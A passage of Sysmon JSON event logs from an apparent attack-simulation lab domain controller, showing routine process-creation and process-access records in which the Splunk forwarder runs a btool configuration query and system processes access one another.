06:49:16.880","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-001054890300}","SourceProcessId":"2780","SourceThreadId":"1604","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1040","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\System32\\combase.dll+4d01b|C:\\Windows\\System32\\combase.dll+9e002|C:\\Windows\\System32\\combase.dll+9e92e|C:\\Windows\\System32\\combase.dll+9e6ef|C:\\Windows\\System32\\combase.dll+3fff8|C:\\Windows\\System32\\combase.dll+3fc10|C:\\Windows\\System32\\combase.dll+4fa47|C:\\Windows\\System32\\combase.dll+c1ef4|C:\\Windows\\System32\\combase.dll+4ea07|C:\\Windows\\System32\\combase.dll+4a6d0|C:\\Windows\\System32\\combase.dll+3f5a|C:\\Windows\\System32\\RPCRT4.dll+dbd2a|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3f3|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1794,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.889\r\nProcessGuid: {E2A3D6B1-106C-5F25-0000-001016930300}\r\nProcessId: 3784\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-106C-5F25-0000-0010EE620300}\r\nParentProcessId: 3864\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.889","ProcessGuid":"{E2A3D6B1-106C-5F25-0000-001016930300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-106C-5F25-0000-0010EE620300}","ParentProcessId":"3864","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1795,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010EE620300}\r\nSourceProcessId: 3864\r\nSourceThreadId: 3868\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001016930300}\r\nTargetProcessId: 3784\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14ab4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010EE620300}","SourceProcessId":"3864","SourceThreadId":"3868","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001016930300}","TargetProcessId":"3784","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14ab4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1796,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001016930300}\r\nTargetProcessId: 3784\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001016930300}","TargetProcessId":"3784","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1797,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1798,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1799,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1800,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1801,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
